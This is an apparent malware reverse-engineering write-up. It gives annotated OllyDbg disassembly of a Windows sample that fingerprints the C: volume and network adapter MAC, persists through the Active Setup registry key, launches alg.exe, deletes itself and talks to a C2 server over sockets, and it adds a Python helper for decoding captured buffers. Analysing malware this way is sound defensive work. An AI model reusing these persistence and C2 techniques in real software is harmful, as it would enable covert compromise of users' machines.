004039B1 |. E8 2AFAFFFF |call sample(?004033E0
004039B6 |. 83C4 04 |add esp,0x4
004039B9 |. 6A 06 |push 0x6
004039BB |. E8 20FAFFFF |call sample(?004033E0
004039C0 |. 83C4 04 |add esp,0x4
004039C3 |. 33C9 |xor ecx,ecx
004039C5 |. 85C9 |test ecx,ecx
004039C7 |.^ 75 96 \jnz Xsample(?0040395F
004039C9 |. 8D95 F4D7FFFF lea edx,[local.2563]
004039CF |. 52 push edx
004039D0 |. 8D85 FCD7FFFF lea eax,[local.2561]
004039D6 |. 50 push eax
004039D7 |. FF15 D0D84000 call dword ptr ds:[0x40D8D0] ; iphlpapi.GetAdaptersInfo
004039DD |. 83C4 08 add esp,0x8
004039E0 |. 8985 F8D7FFFF mov [local.2562],eax
004039E6 |. 83BD F8D7FFFF>cmp [local.2562],0x0
004039ED |. 75 1A jnz Xsample(?00403A09
004039EF |. 6A 06 push 0x6
004039F1 |. 8B4D FC mov ecx,[local.1]
004039F4 |. 81C1 94010000 add ecx,0x194
004039FA |. 51 push ecx
004039FB |. 8B55 08 mov edx,[arg.1]
004039FE |. 52 push edx
004039FF |. E8 9C080000 call sample(?004042A0 ; _memcpy
00403A04 |. 83C4 0C add esp,0xC
00403A07 |. EB 13 jmp Xsample(?00403A1C
00403A09 |> 6A 06 push 0x6
00403A0B |. 68 10CD4000 push sample(?0040CD10
00403A10 |. 8B45 08 mov eax,[arg.1]
00403A13 |. 50 push eax
00403A14 |. E8 87080000 call sample(?004042A0
00403A19 |. 83C4 0C add esp,0xC
00403A1C |> 8BE5 mov esp,ebp
00403A1E |. 5D pop ebp
……
Write the C: drive information and local adapter information obtained above into the alg.exe file, in preparation for the later network connection
0040182D |. E8 60FCFFFF call sample(?00401492
00401832 |. 83C4 0C add esp,0xC ; write the file
00401835 |> 6A 00 push 0x0 ; /pOverlapped = NULL
00401837 |. 8D4D F0 lea ecx,[local.4] ; |
0040183A |. 51 push ecx ; |pBytesWritten
0040183B |. 8B55 0C mov edx,[arg.2] ; |
0040183E |. 8B42 08 mov eax,dword ptr ds:[edx+0x8] ; |
00401841 |. 50 push eax ; |nBytesToWrite
00401842 |. 8B8D CCFDFFFF mov ecx,[local.141] ; |
00401848 |. 51 push ecx ; |Buffer
00401849 |. 8B95 D4FDFFFF mov edx,[local.139] ; |
0040184F |. 52 push edx ; |hFile
00401850 |. FF15 14B04000 call dword ptr ds:[<&KERNEL32.WriteFile>] ; \WriteFile
00401856 |. 85C0 test eax,eax
00401858 |. 75 04 jnz Xsample(?0040185E
0040185A |. 33C0 xor eax,eax
……
Get random numbers
00401CE1 > \8D95 D0FAFFFF lea edx,dword ptr ss:[ebp-0x530]
00401CE7 . 52 push edx
00401CE8 . 68 F0C24000 push sample(?0040C2F0 ; UNICODE "exe path = %ls"
00401CED . E8 D12C0000 call sample(?004049C3 ; _wprintf
00401CF2 . 83C4 08 add esp,0x8
00401CF5 > 6A 00 push 0x0
00401CF7 . E8 01290000 call sample(?004045FD ; _time
00401CFC . 83C4 04 add esp,0x4
00401CFF . 50 push eax
00401D00 . E8 D0280000 call sample(?004045D5 ; assigns the value; stepped over
00401D05 . 83C4 04 add esp,0x4
00401D08 . C745 FC 00000>mov dword ptr ss:[ebp-0x4],0x0
00401D0F > B8 01000000 mov eax,0x1
00401D14 . 85C0 test eax,eax
00401D16 . 74 1A je Xsample(?00401D32
00401D18 . E8 C2280000 call sample(?004045DF ; _rand
00401D1D . 8985 C4F8FFFF mov dword ptr ss:[ebp-0x73C],eax ; get a random number
00401D23 . E8 B7280000 call sample(?004045DF ; _rand
00401D28 . 8B8D C4F8FFFF mov ecx,dword ptr ss:[ebp-0x73C]
……
Modify the registry under Registry\Machine\SOFTWARE\Microsoft\Active Setup\Installed Components\,
writing the malware in as a system component so that it can run before the system has started
004022B6 |. 83EC 38 sub esp,0x38
004022B9 |. C745 D0 00000>mov [local.12],0x0
004022C0 |. 6A 00 push 0x0
004022C2 |. 68 00080000 push 0x800
004022C7 |. 68 C01B4100 push sample(?00411BC0 ; UNICODE "\Registry\Machine\SOFTWARE\Microsoft\Active Setup\Installed Components\{38B0D69C-E704-E2C6-EC2A-CDF3"
004022CC |. E8 2F1F0000 call sample(?00404200 ; _memset
004022D1 |. 83C4 0C add esp,0xC
004022D4 |. 6A 00 push 0x0
004022D6 |. E8 22230000 call sample(?004045FD ; _time
004022DB |. 83C4 04 add esp,0x4
004022DE |. 50 push eax
004022DF |. E8 F1220000 call sample(?004045D5 ; assigns the value; stepped over
004022E4 |. 83C4 04 add esp,0x4
004022E7 |. 68 80C34000 push sample(?0040C380 ; UNICODE "\Registry\Machine\SOFTWARE\Microsoft\Active Setup\Installed Components\{38B0D69C-E704-E2C6-EC2A-CDF3"
004022EC |. 68 C01B4100 push sample(?00411BC0 ; UNICODE "\Registry\Machine\SOFTWARE\Microsoft\Active Setup\Installed Components\{38B0D69C-E704-E2C6-EC2A-CDF3"
004022F1 |. E8 00280000 call sample(?00404AF6 ; _swprintf
004022F6 |. 83C4 08 add esp,0x8
004022F9 |. 68 C01B4100 push sample(?00411BC0 ; UNICODE "\Registry\Machine\SOFTWARE\Microsoft\Active Setup\Installed Components\{38B0D69C-E704-E2C6-EC2A-CDF3"
004022FE |. E8 3A2C0000 call sample(?00404F3D ; _wcslen
00402303 |. 83C4 04 add esp,0x4
00402306 |. D1E0 shl eax,1
00402308 |. 66:8945 FA mov word ptr ss:[ebp-0x6],ax
0040230C |. 66:8B45 FA mov ax,word ptr ss:[ebp-0x6]
00402310 |. 66:8945 F8 mov word ptr ss:[ebp-0x8],ax
00402314 |. C745 FC C01B4>mov [local.1],sample(?00411BC0 ; UNICODE "\Registry\Machine\SOFTWARE\Microsoft\Active Setup\Installed Components\{38B0D69C-E704-E2C6-EC2A-CDF3"
0040231B |> 6A 09 /push 0x9
0040231D |. E8 4F110000 |call sample(?00403471 ; NtCreateKey
00402322 |. 83C4 04 |add esp,0x4
00402325 |. 50 |push eax
00402326 |. 6A 01 |push 0x1
00402328 |. E8 44110000 |call sample(?00403471 ; ntdll.dll
0040232D |. 83C4 04 |add esp,0x4
00402330 |. 50 |push eax ; |/FileName
00402331 |. FF15 28B04000 |call dword ptr ds:[<&KERNEL32.Loa>; |\LoadLibraryA
00402337 |. 50 |push eax ; |hModule
00402338 |. FF15 24B04000 |call dword ptr ds:[<&KERNEL32.Get>; \GetProcAddress
0040233E |. A3 64D84000 |mov dword ptr ds:[0x40D864],eax
00402343 |. 833D 64D84000>|cmp dword ptr ds:[0x40D864],0x0
0040234A |. 75 12 |jnz Xsample(?0040235E
0040234C |. 68 68C44000 |push sample(?0040C468 ; ASCII "GetProcAddress"
00402351 |. E8 24130000 |call sample(?0040367A
00402356 |. 83C4 04 |add esp,0x4
00402359 |. 8945 CC |mov [local.13],eax
0040235C |. EB 07 |jmp Xsample(?00402365
0040235E |> C745 CC 01000>|mov [local.13],0x1
00402365 |> 6A 01 |push 0x1
00402367 |. E8 74100000 |call sample(?004033E0
0040236C |. 83C4 04 |add esp,0x4
0040236F |. 6A 09 |push 0x9
00402371 |. E8 6A100000 |call sample(?004033E0
00402376 |. 83C4 04 |add esp,0x4
00402379 |. 33C9 |xor ecx,ecx
0040237B |. 85C9 |test ecx,ecx
0040237D |.^ 75 9C \jnz Xsample(?0040231B
0040237F |> 6A 0A /push 0xA
00402381 |. E8 EB100000 |call sample(?00403471 ; NtClose
00402386 |. 83C4 04 |add esp,0x4
00402389 |. 50 |push eax
0040238A |. 6A 01 |push 0x1
0040238C |. E8 E0100000 |call sample(?00403471 ; ntdll.dll
00402391 |. 83C4 04 |add esp,0x4
00402394 |. 50 |push eax ; |/FileName
00402395 |. FF15 28B04000 |call dword ptr ds:[<&KERNEL32.Loa>; |\LoadLibraryA
0040239B |. 50 |push eax ; |hModule
0040239C |. FF15 24B04000 |call dword ptr ds:[<&KERNEL32.Get>; \GetProcAddress
004023A2 |. A3 6CD84000 |mov dword ptr ds:[0x40D86C],eax
004023A7 |. 833D 6CD84000>|cmp dword ptr ds:[0x40D86C],0x0
004023AE |. 75 12 |jnz Xsample(?004023C2
004023B0 |. 68 78C44000 |push sample(?0040C478 ; ASCII "GetProcAddress"
004023B5 |. E8 C0120000 |call sample(?0040367A
004023BA |. 83C4 04 |add esp,0x4
004023BD |. 8945 C8 |mov [local.14],eax
004023C0 |. EB 07 |jmp Xsample(?004023C9
004023C2 |> C745 C8 01000>|mov [local.14],0x1
004023C9 |> 6A 01 |push 0x1
004023CB |. E8 10100000 |call sample(?004033E0
004023D0 |. 83C4 04 |add esp,0x4
004023D3 |. 6A 0A |push 0xA
004023D5 |. E8 06100000 |call sample(?004033E0
004023DA |. 83C4 04 |add esp,0x4
004023DD |. 33D2 |xor edx,edx
004023DF |. 85D2 |test edx,edx
004023E1 |.^ 75 9C \jnz Xsample(?0040237F
004023E3 |. C745 E0 18000>mov [local.8],0x18
004023EA |. C745 EC 40000>mov [local.5],0x40
004023F1 |. 8D45 F8 lea eax,[local.2]
004023F4 |. 8945 E8 mov [local.6],eax
004023F7 |. 8B4D D0 mov ecx,[local.12]
004023FA |. 894D E4 mov [local.7],ecx
004023FD |. C745 F0 00000>mov [local.4],0x0
00402404 |. C745 F4 00000>mov [local.3],0x0
0040240B |. 8D55 DC lea edx,[local.9]
0040240E |. 52 push edx
0040240F |. 6A 00 push 0x0
00402411 |. 6A 00 push 0x0
00402413 |. 6A 00 push 0x0
00402415 |. 8D45 E0 lea eax,[local.8]
00402418 |. 50 push eax
00402419 |. 6A 02 push 0x2
0040241B |. 8D4D D4 lea ecx,[local.11]
0040241E |. 51 push ecx ; cr.sa.exe
0040241F |. FF15 64D84000 call dword ptr ds:[0x40D864] ; ntdll.ZwCreateKey
00402425 |. 83C4 1C add esp,0x1C
00402428 |. 8945 D8 mov [local.10],eax
0040242B |. 837D D8 00 cmp [local.10],0x0
0040242F |. 7D 16 jge Xsample(?00402447
00402431 |. 8B55 D8 mov edx,[local.10]
00402434 |. 52 push edx
00402435 |. 68 88C44000 push sample(?0040C488 ; ASCII "NtCreateKey"
0040243A |. E8 E6120000 call sample(?00403725
0040243F |. 83C4 08 add esp,0x8
00402442 |. 83C8 FF or eax,0xFFFFFFFF
00402445 |. EB 0C jmp Xsample(?00402453
00402447 |> 8B45 D4 mov eax,[local.11]
0040244A |. 50 push eax
0040244B |. FF15 6CD84000 call dword ptr ds:[0x40D86C] ; ntdll.ZwClose
00402451 |. 33C0 xor eax,eax
00402453 |> 8BE5 mov esp,ebp
00402455 |. 5D pop ebp ; 0012FF34
************************************************************************************************************
Write alg.exe into the registry
00402A60 /$ 55 push ebp
00402A61 |. 8BEC mov ebp,esp
00402A63 |. 83EC 10 sub esp,0x10
00402A66 |> 6A 0D /push 0xD
00402A68 |. E8 040A0000 |call sample(?00403471 ; NtSetValueKey
00402A6D |. 83C4 04 |add esp,0x4
00402A70 |. 50 |push eax
00402A71 |. 6A 01 |push 0x1
00402A73 |. E8 F9090000 |call sample(?00403471 ; ntdll.dll
00402A78 |. 83C4 04 |add esp,0x4
00402A7B |. 50 |push eax ; |/FileName
00402A7C |. FF15 28B04000 |call dword ptr ds:[<&KERNEL32.Loa>; |\LoadLibraryA
00402A82 |. 50 |push eax ; |hModule
00402A83 |. FF15 24B04000 |call dword ptr ds:[<&KERNEL32.Get>; \GetProcAddress
00402A89 |. A3 98D84000 |mov dword ptr ds:[0x40D898],eax
00402A8E |. 833D 98D84000>|cmp dword ptr ds:[0x40D898],0x0
00402A95 |. 75 12 |jnz Xsample(?00402AA9
00402A97 |. 68 ECC54000 |push sample(?0040C5EC ; ASCII "GetProcAddress"
00402A9C |. E8 D90B0000 |call sample(?0040367A
00402AA1 |. 83C4 04 |add esp,0x4
00402AA4 |. 8945 F0 |mov [local.4],eax
00402AA7 |. EB 07 |jmp Xsample(?00402AB0
00402AA9 |> C745 F0 01000>|mov [local.4],0x1
00402AB0 |> 6A 01 |push 0x1
00402AB2 |. E8 29090000 |call sample(?004033E0
00402AB7 |. 83C4 04 |add esp,0x4
00402ABA |. 6A 0D |push 0xD
00402ABC |. E8 1F090000 |call sample(?004033E0
00402AC1 |. 83C4 04 |add esp,0x4
00402AC4 |. 33C0 |xor eax,eax
00402AC6 |. 85C0 |test eax,eax
00402AC8 |.^ 75 9C \jnz Xsample(?00402A66
00402ACA |. 8B4D 0C mov ecx,[arg.2]
00402ACD |. 51 push ecx
00402ACE |. E8 6A240000 call sample(?00404F3D ; _wcslen
00402AD3 |. 83C4 04 add esp,0x4
00402AD6 |. D1E0 shl eax,1
00402AD8 |. 66:8945 FA mov word ptr ss:[ebp-0x6],ax
00402ADC |. 66:8B55 FA mov dx,word ptr ss:[ebp-0x6]
00402AE0 |. 66:8955 F8 mov word ptr ss:[ebp-0x8],dx
00402AE4 |. 8B45 0C mov eax,[arg.2]
00402AE7 |. 8945 FC mov [local.1],eax
00402AEA |. 8B4D 18 mov ecx,[arg.5]
00402AED |. 51 push ecx
00402AEE |. 8B55 14 mov edx,[arg.4]
00402AF1 |. 52 push edx
00402AF2 |. 8B45 10 mov eax,[arg.3]
00402AF5 |. 50 push eax
00402AF6 |. 6A 00 push 0x0
00402AF8 |. 8D4D F8 lea ecx,[local.2]
00402AFB |. 51 push ecx
00402AFC |. 8B55 08 mov edx,[arg.1]
00402AFF |. 52 push edx
00402B00 |. FF15 98D84000 call dword ptr ds:[0x40D898] ; ntdll.ZwSetValueKey
00402B06 |. 8945 F4 mov [local.3],eax
00402B09 |. 837D F4 00 cmp [local.3],0x0
00402B0D |. 7D 16 jge Xsample(?00402B25
00402B0F |. 8B45 F4 mov eax,[local.3]
00402B12 |. 50 push eax
00402B13 |. 68 FCC54000 push sample(?0040C5FC ; ASCII "NtSetValueKey"
00402B18 |. E8 080C0000 call sample(?00403725
00402B1D |. 83C4 08 add esp,0x8
00402B20 |. 83C8 FF or eax,0xFFFFFFFF
00402B23 |. EB 02 jmp Xsample(?00402B27
00402B25 |> 33C0 xor eax,eax
00402B27 |> 8BE5 mov esp,ebp
00402B29 |. 5D pop ebp
Run alg.exe and delete the malware sample
00404D8F |. 8D45 F8 lea eax,[local.2]
00404D92 |. 8943 FC mov dword ptr ds:[ebx-0x4],eax
00404D95 |. 8B73 0C mov esi,dword ptr ds:[ebx+0xC]
00404D98 |. 8B7B 08 mov edi,dword ptr ds:[ebx+0x8]
00404D9B |> 83FE FF /cmp esi,-0x1
00404D9E |. 74 61 |je Xsample(?00404E01
00404DA0 |. 8D0C76 |lea ecx,dword ptr ds:[esi+esi*2]
00404DA3 |. 837C8F 04 00 |cmp dword ptr ds:[edi+ecx*4+0x4],0x0
00404DA8 |. 74 45 |je Xsample(?00404DEF
00404DAA |. 56 |push esi
00404DAB |. 55 |push ebp
00404DAC |. 8D6B 10 |lea ebp,dword ptr ds:[ebx+0x10]
00404DAF |. FF548F 04 |call dword ptr ds:[edi+ecx*4+0x4]
00404DB3 |. 5D |pop ebp
00404DB4 |. 5E |pop esi ;
00404DB5 |. 8B5D 0C |mov ebx,[arg.2]
00404DB8 |. 0BC0 |or eax,eax
00404DBA |. 74 33 |je Xsample(?00404DEF
00404DBC |. 78 3C |js Xsample(?00404DFA
00404DBE |. 8B7B 08 |mov edi,dword ptr ds:[ebx+0x8] ; runs alg.exe
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
The important network parts of alg.exe are all encrypted, so I could only set breakpoints on send, socket and similar functions once some of its network functions had been decrypted,
and then jump to the networking part.
There are too many encrypted places; with my limited skill I only managed to locate part of the network code.
******************************************************************************************************************
00401176 /$ 55 push ebp
00401177 |. 8BEC mov ebp,esp
00401179 |. 83EC 1C sub esp,0x1C
0040117C |. E8 A4040000 call alg.00401625 ; get C: drive information
00401181 |. 8945 FC mov [local.1],eax
00401184 |. 8D45 F4 lea eax,[local.3]
00401187 |. 50 push eax
00401188 |. E8 48050000 call alg.004016D5 ; get local adapter and IP information
0040118D |. 8D45 E4 lea eax,[local.7]
00401190 |. C70424 40F04000 mov dword ptr ss:[esp],alg.0040F040
00401197 |. 50 push eax
00401198 |. 8D45 F4 lea eax,[local.3]
0040119B |. 50 push eax
0040119C |. 8D45 FC lea eax,[local.1]
0040119F |. 50 push eax
004011A0 |. E8 92400000 call alg.00405237 ; string copy: the two values are combined into one string
004011A5 |. FF75 0C push [arg.2]
Getting C: drive information
******************************************************************************************************************
00401658 |. 895D FC mov [local.1],ebx
0040165B |. 895D F8 mov [local.2],ebx
0040165E |. 895D F4 mov [local.3],ebx
00401661 |. E8 F4FDFFFF call alg.0040145A ; -> "GetVolumeInformationA" (decrypted string)
00401666 |. 59 pop ecx
00401667 |. 50 push eax ; lpProcName
00401668 |. 6A 02 push 0x2
0040166A |. E8 EBFDFFFF call alg.0040145A ; -> "Kernel32.dll" (decrypted string)
0040166F |. 59 pop ecx ; |
00401670 |. 50 push eax ; |/FileName
00401671 |. FF15 08B04000 call dword ptr ds:[<&KERNEL32.LoadLibraryA>] ; |\LoadLibraryA
00401677 |. 50 push eax ; |hModule
00401678 |. FF15 04B04000 call dword ptr ds:[<&KERNEL32.GetProcAddress>] ; \GetProcAddress
0040167E |. 5F pop edi
0040167F |. 3BC3 cmp eax,ebx
00401681 |. A3 04104100 mov dword ptr ds:[0x411004],eax
00401686 |. 5B pop ebx
00401687 |. 75 0B jnz Xalg.00401694
00401689 |. 68 20004100 push alg.00410020 ; GetProcAddress
0040168E |. E8 08FFFFFF call alg.0040159B
00401693 |. 59 pop ecx
00401694 |> 6A 02 push 0x2
00401696 |. E8 88FDFFFF call alg.00401423
0040169B |. 6A 05 push 0x5
0040169D |. E8 81FDFFFF call alg.00401423
004016A2 |. 59 pop ecx
004016A3 |. B8 05010000 mov eax,0x105 ; 0x105 = MAX_PATH+1, used as both buffer sizes below
004016A8 |. 59 pop ecx
004016A9 |. 8D8D ECFEFFFF lea ecx,[local.69]
004016AF |. 50 push eax ; nFileSystemNameSize
004016B0 |. 51 push ecx ; lpFileSystemNameBuffer
004016B1 |. 8D4D F4 lea ecx,[local.3]
004016B4 |. 51 push ecx ; lpFileSystemFlags
004016B5 |. 8D4D F8 lea ecx,[local.2]
004016B8 |. 51 push ecx ; lpMaximumComponentLength
004016B9 |. 8D4D FC lea ecx,[local.1]
004016BC |. 51 push ecx ; lpVolumeSerialNumber
004016BD |. 50 push eax ; nVolumeNameSize
004016BE |. 8D85 E4FDFFFF lea eax,[local.135]
004016C4 |. 50 push eax ; lpVolumeNameBuffer
004016C5 |. 68 68004100 push alg.00410068 ; lpRootPathName = "C:\"
004016CA |. FF15 04104100 call dword ptr ds:[0x411004] ; GetVolumeInformationA("C:\", ...)
004016D0 |. 8B45 FC mov eax,[local.1] ; return value = volume serial number of C:
004016D3 |. C9 leave
******************************************************************************************************************
Getting the local NIC's MAC address in preparation for network communication
******************************************************************************************************************
004016D5 /$ 55 push ebp
004016D6 |. 8BEC mov ebp,esp
004016D8 |. B8 04280000 mov eax,0x2804
004016DD |. E8 4E450000 call alg.00405C30 ; __alloca_probe
004016E2 |. 6A 06 push 0x6
004016E4 |. C745 FC 00280000 mov [local.1],0x2800 ; OutBufLen for GetAdaptersInfo
004016EB |. E8 6AFDFFFF call alg.0040145A ; -> "GetAdaptersInfo" (decrypted string)
004016F0 |. 59 pop ecx
004016F1 |. 50 push eax ; lpProcName
004016F2 |. 6A 03 push 0x3
004016F4 |. E8 61FDFFFF call alg.0040145A ; -> "Iphlpapi.dll" (decrypted string)
004016F9 |. 59 pop ecx ; |
004016FA |. 50 push eax ; |/FileName
004016FB |. FF15 08B04000 call dword ptr ds:[<&KERNEL32.LoadLibraryA>] ; |\LoadLibraryA
00401701 |. 50 push eax ; |hModule
00401702 |. FF15 04B04000 call dword ptr ds:[<&KERNEL32.GetProcAddress>] ; \GetProcAddress
00401708 |. 85C0 test eax,eax
0040170A |. A3 08104100 mov dword ptr ds:[0x411008],eax
0040170F |. 75 0B jnz Xalg.0040171C
00401711 |. 68 20004100 push alg.00410020 ; GetProcAddress
00401716 |. E8 80FEFFFF call alg.0040159B
0040171B |. 59 pop ecx
0040171C |> 6A 03 push 0x3
0040171E |. E8 00FDFFFF call alg.00401423
00401723 |. 6A 06 push 0x6
00401725 |. E8 F9FCFFFF call alg.00401423
0040172A |. 8D45 FC lea eax,[local.1] ; pOutBufLen (0x2800)
0040172D |. 50 push eax
0040172E |. 8D85 FCD7FFFF lea eax,[local.2561] ; pAdapterInfo, a 0x2800-byte stack buffer
00401734 |. 50 push eax
00401735 |. FF15 08104100 call dword ptr ds:[0x411008] ; iphlpapi.GetAdaptersInfo
0040173B |. 83C4 10 add esp,0x10
0040173E |. 85C0 test eax,eax ; ERROR_SUCCESS (0)?
00401740 |. 6A 06 push 0x6 ; copy 6 bytes
00401742 |. 75 09 jnz Xalg.0040174D
00401744 |. 8D85 90D9FFFF lea eax,[local.2460] ; pAdapterInfo+0x194 = IP_ADAPTER_INFO.Address of the first adapter, i.e. its MAC
0040174A |. 50 push eax
0040174B |. EB 05 jmp Xalg.00401752
0040174D |> 68 6C004100 push alg.0041006C ; on failure: a fixed 6-byte value from the data section
00401752 |> FF75 08 push [arg.1] ; destination buffer supplied by the caller
00401755 |. E8 A63E0000 call alg.00405600 ; _memcpy(dst, src, 6)
0040175A |. 83C4 0C add esp,0xC
0040175D |. C9 leave
0040175E \. C3 retn
******************************************************************************************************************
Running alg.exe
******************************************************************************************************************
00401294 . 50 push eax
00401295 . E8 51410000 call alg.004053EB ; assignment, step over
0040129A . 59 pop ecx
0040129B . 59 pop ecx
0040129C . 897D FC mov dword ptr ss:[ebp-0x4],edi
0040129F > E8 51410000 call alg.004053F5 ; _rand
004012A4 . 8BF0 mov esi,eax
004012A6 . 89B5 D0FDFFFF mov dword ptr ss:[ebp-0x230],esi
004012AC . E8 44410000 call alg.004053F5 ; _rand
004012B1 . 8806 mov byte ptr ds:[esi],al ; run alg.exe
004012B3 .^ EB EA jmp Xalg.0040129F
004012B5 . 6A 00 push 0x0
004012B7 . E8 C5000000 call alg.00401381
004012BC . 59 pop ecx
******************************************************************************************************************
ws2_32.inet_addr converts the IP string to a 32-bit integer
******************************************************************************************************************
003B025F FF56 01 call dword ptr ds:[esi+0x1] ; returns the socket used by connect below
003B0262 8945 FC mov dword ptr ss:[ebp-0x4],eax
003B0265 66:C785 58FEFFF>mov word ptr ss:[ebp-0x1A8],0x2 ; sockaddr_in.sin_family = AF_INET (sin_port is not assigned in the lines shown)
003B026E 8D85 45FDFFFF lea eax,dword ptr ss:[ebp-0x2BB] ; target string (IP or hostname)
003B0274 50 push eax
003B0275 FF56 19 call dword ptr ds:[esi+0x19] ; ws2_32.inet_addr: dotted-quad string -> 32-bit address
003B0278 83F8 FF cmp eax,-0x1 ; INADDR_NONE: the string is not a dotted quad
003B027B 75 1A jnz X003B0297
003B027D 8D85 45FDFFFF lea eax,dword ptr ss:[ebp-0x2BB]
003B0283 50 push eax
003B0284 FF56 1D call dword ptr ds:[esi+0x1D] ; ws2_32.gethostbyname: resolve the string as a hostname instead
003B0287 0BC0 or eax,eax
003B0289 75 05 jnz X003B0290
003B028B E9 CC020000 jmp 003B055C ; resolution failed
003B0290 8B40 0C mov eax,dword ptr ds:[eax+0xC] ; hostent.h_addr_list
003B0293 8B00 mov eax,dword ptr ds:[eax] ; h_addr_list[0]
003B0295 8B00 mov eax,dword ptr ds:[eax] ; first IPv4 address
003B0297 8985 5CFEFFFF mov dword ptr ss:[ebp-0x1A4],eax ; sockaddr_in.sin_addr
003B029D 8D85 58FEFFFF lea eax,dword ptr ss:[ebp-0x1A8]
003B02A3 50 push eax
003B02A4 8F86 25010000 pop dword ptr ds:[esi+0x125] ; keep a pointer to the sockaddr_in in the structure at esi
003B02AA 6A 10 push 0x10 ; sizeof(sockaddr_in)
003B02AC 8D85 58FEFFFF lea eax,dword ptr ss:[ebp-0x1A8]
003B02B2 50 push eax ; &sockaddr_in
003B02B3 FF75 FC push dword ptr ss:[ebp-0x4] ; socket
003B02B6 FF56 05 call dword ptr ds:[esi+0x5] ; ws2_32.connect
003B02B9 0BC0 or eax,eax
003B02BB 0F85 9B020000 jnz 003B055C ; SOCKET_ERROR -> give up
003B02C1 C785 34FCFFFF 1>mov dword ptr ss:[ebp-0x3CC],0x2710
003B02CB 80BE EF0A0000 0>cmp byte ptr ds:[esi+0xAEF],0x0
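Two things an analyst wants ready when these breakpoints hit: the offset at which the 6-byte MAC sits inside the IP_ADAPTER_INFO buffer that GetAdaptersInfo filled (the listing above copies from pAdapterInfo+0x194), and a decoder for the 16-byte sockaddr_in passed to connect, plus the inet_addr-then-gethostbyname fallback the connect routine implements. The following is an added example, not code from the sample or from the original post; the IP_ADAPTER_INFO field sizes are the 32-bit SDK layout, and the adapter buffer and sockaddr_in bytes are constructed test data, not values captured from the sample (the page does not show the C2 address or port).

```python
import socket
import struct

# Offsets inside the 32-bit IP_ADAPTER_INFO structure (field sizes from the Windows SDK):
#   Next 4 | ComboIndex 4 | AdapterName 260 | Description 132 | AddressLength 4 | Address 8 | ...
ADAPTER_ADDRESS_LENGTH_OFF = 4 + 4 + 260 + 132        # 0x190
ADAPTER_ADDRESS_OFF = ADAPTER_ADDRESS_LENGTH_OFF + 4  # 0x194 == local.2561 - local.2460 in the listing
SOCKADDR_IN_SIZE = 16                                 # the 0x10 pushed before connect


def first_adapter_mac(adapter_info: bytes) -> bytes:
    """MAC (Address[0:AddressLength]) of the first entry in a dumped IP_ADAPTER_INFO buffer.

    This is exactly what the sample's memcpy(dst, pAdapterInfo + 0x194, 6) copies out.
    """
    (addr_len,) = struct.unpack_from("<I", adapter_info, ADAPTER_ADDRESS_LENGTH_OFF)
    if not 0 < addr_len <= 8:
        raise ValueError("implausible AddressLength %d: wrong buffer or wrong offset" % addr_len)
    return adapter_info[ADAPTER_ADDRESS_OFF:ADAPTER_ADDRESS_OFF + addr_len]


def decode_sockaddr_in(raw: bytes):
    """Decode the sockaddr_in handed to connect(): (family, port, dotted-quad IP).

    sin_family is in host (little-endian) byte order, sin_port in network byte order.
    """
    if len(raw) < SOCKADDR_IN_SIZE:
        raise ValueError("sockaddr_in is %d bytes" % SOCKADDR_IN_SIZE)
    (family,) = struct.unpack_from("<H", raw, 0)
    (port,) = struct.unpack_from(">H", raw, 2)
    ip = socket.inet_ntoa(raw[4:8])
    family_name = "AF_INET" if family == socket.AF_INET else "AF_%d" % family
    return family_name, port, ip


def resolve_target(target: str) -> bytes:
    """The sample's address logic: inet_addr first, gethostbyname only if that yields INADDR_NONE."""
    try:
        return socket.inet_aton(target)  # dotted quad: the 4 bytes stored in sin_addr
    except OSError:
        # Hostname: h_addr_list[0] of the hostent, which the listing dereferences as [[[eax+0xC]]]
        return socket.inet_aton(socket.gethostbyname(target))


# Constructed test data (not captured from the sample): one adapter with MAC 00:11:22:33:44:55,
# and the sockaddr_in for 192.168.1.10:8080.
SAMPLE_ADAPTER_INFO = (
    b"\x00" * ADAPTER_ADDRESS_LENGTH_OFF
    + struct.pack("<I", 6)
    + bytes.fromhex("001122334455") + b"\x00\x00"
    + b"\x00" * 0x100
)
SAMPLE_SOCKADDR = (
    struct.pack("<H", socket.AF_INET)
    + struct.pack(">H", 8080)
    + socket.inet_aton("192.168.1.10")
    + b"\x00" * 8
)

if __name__ == "__main__":
    print("first adapter MAC:", first_adapter_mac(SAMPLE_ADAPTER_INFO).hex(":"))
    print("connect() target :", decode_sockaddr_in(SAMPLE_SOCKADDR))
    print("sin_addr for 192.168.1.10:", resolve_target("192.168.1.10").hex())
```

In OllyDbg, dump the 0x2800 bytes at [local.2561] after the GetAdaptersInfo call and feed them to first_adapter_mac; dump the 16 bytes at [ebp-0x1A8] when the connect breakpoint hits and feed them to decode_sockaddr_in to read off the C2 address and port.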
******************************************************************************************************************
Sending data: send
******************************************************************************************************************
003B0620 8D85 F4FEFFFF lea eax,dword ptr ss:[ebp-0x10C]
003B0626 50 push eax
003B0627 6A 00 push 0x0
003B0629 FF96 99000000 call dword ptr ds:[esi+0x99] ; select: wait until the socket is ready
003B062F 83F8 00 cmp eax,0x0
003B0632 76 1E jbe X003B0652 ; timeout or error -> return 0
003B0634 6A 00 push 0x0 ; flags
003B0636 FF75 18 push dword ptr ss:[ebp+0x18] ; len
003B0639 FF75 14 push dword ptr ss:[ebp+0x14] ; buf
003B063C FF75 10 push dword ptr ss:[ebp+0x10] ; socket
003B063F 837D 0C 00 cmp dword ptr ss:[ebp+0xC],0x0 ; direction flag selects send or recv
003B0643 75 05 jnz X003B064A
003B0645 FF56 11 call dword ptr ds:[esi+0x11] ; ws2_32.recv
003B0648 EB 03 jmp X003B064D
003B064A FF56 0D call dword ptr ds:[esi+0xD] ; ws2_32.send
003B064D 83F8 01 cmp eax,0x1
003B0650 7D 07 jge X003B0659 ; at least 1 byte transferred -> success
003B0652 61 popad
003B0653 33C0 xor eax,eax ; failure: return 0
003B0655 C9 leave
******************************************************************************************************************
Receive path of the same send/recv wrapper; the network data is compressed with RtlCompressBuffer
******************************************************************************************************************
003B0615 8D85 ECFEFFFF lea eax,dword ptr ss:[ebp-0x114]
003B061B 50 push eax
003B061C 6A 00 push 0x0
003B061E 6A 00 push 0x0
003B0620 8D85 F4FEFFFF lea eax,dword ptr ss:[ebp-0x10C]
003B0626 50 push eax
003B0627 6A 00 push 0x0
003B0629 FF96 99000000 call dword ptr ds:[esi+0x99] ; select
003B062F 83F8 00 cmp eax,0x0
003B0632 76 1E jbe X003B0652
003B0634 6A 00 push 0x0 ; flags
003B0636 FF75 18 push dword ptr ss:[ebp+0x18] ; len
